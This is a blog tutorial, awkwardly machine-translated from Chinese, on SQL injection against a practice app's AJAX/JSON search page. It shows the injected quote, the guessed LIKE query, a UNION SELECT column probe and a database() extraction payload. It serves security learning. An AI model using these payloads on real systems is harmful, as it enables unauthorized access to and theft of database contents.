当前位置:网站首页>SQL Injection (AJAX/JSON/jQuery)
SQL Injection (AJAX/JSON/jQuery)
2022-07-03 13:45:00 【this is hhhhp】
1.AJAX/JSON/jQuery
(1)AJAX
Through a small amount of data exchange with the server in the background ,AJAX Asynchronous update of web pages . This means that you can load the entire page without reloading it , Update a part of the web page in real time .
(2)JSON
JSON (JavaScript Object Notation) Is a lightweight data exchange format .
Is a data format .
(3)jQuery
jQuery It's a JavaScript library , Use jQuery Not only will it take a lot of JavaScript Code to achieve the function reduced to a few lines of code , It also provides enough high-speed performance , It's a skill that every website developer should master .
2. Inject
Let's grab a bag first :
Enter... In the input box i

Bag caught :

first line ,title=i, Change to ' have a look :
sql Wrong report , guess sql The statement is as follows :
select * from Table name where Title like '%". User input ."%'

So it can be constructed like this sql sentence :
select * from Table name where Title like '%"' or '"%
The inquiry is correct , All the movies are

On this basis, inject :
0' union select 1,2,3,4,5,6,7 'obtain 2,3,4,5, altogether 4 Displayable bits

Blast storage :
0' union select 1,database(),3,4,5,6,7 ' 
Just behind GET/Search About the same .
边栏推荐
猜你喜欢

MySQL constraints

Annotation and reflection

Resource Cost Optimization Practice of R & D team

Flutter动态化 | Fair 2.5.0 新版本特性

Flink SQL knows why (19): the transformation between table and datastream (with source code)

TensorBoard可视化处理案例简析

Flink code is written like this. It's strange that the window can be triggered (bad programming habits)

常见的几种最优化方法Matlab原理和深度分析

Logseq 评测:优点、缺点、评价、学习教程

Unable to stop it, domestic chips have made another breakthrough, and some links have reached 4nm
随机推荐
JSP and filter
Comprehensive evaluation of double chain notes remnote: fast input, PDF reading, interval repetition / memory
MapReduce implements matrix multiplication - implementation code
研发团队资源成本优化实践
8皇后问题
双向链表(我们只需要关注插入和删除函数)
SQL Injection (POST/Select)
This math book, which has been written by senior ml researchers for 7 years, is available in free electronic version
Mycms we media mall v3.4.1 release, user manual update
Swiftui development experience: the five most powerful principles that a programmer needs to master
Which securities company has the lowest Commission for opening an account online? I want to open an account. Is it safe for the online account manager to open an account
NFT新的契机,多媒体NFT聚合平台OKALEIDO即将上线
Disruptor -- a high concurrency and high performance queue framework for processing tens of millions of levels
MySQL constraints
Introduction to the implementation principle of rxjs observable filter operator
刚毕业的欧洲大学生,就能拿到美国互联网大厂 Offer?
Tutoriel PowerPoint, comment enregistrer une présentation sous forme de vidéo dans Powerpoint?
Task6: using transformer for emotion analysis
今日睡眠质量记录77分
顺序表(C语言实现)
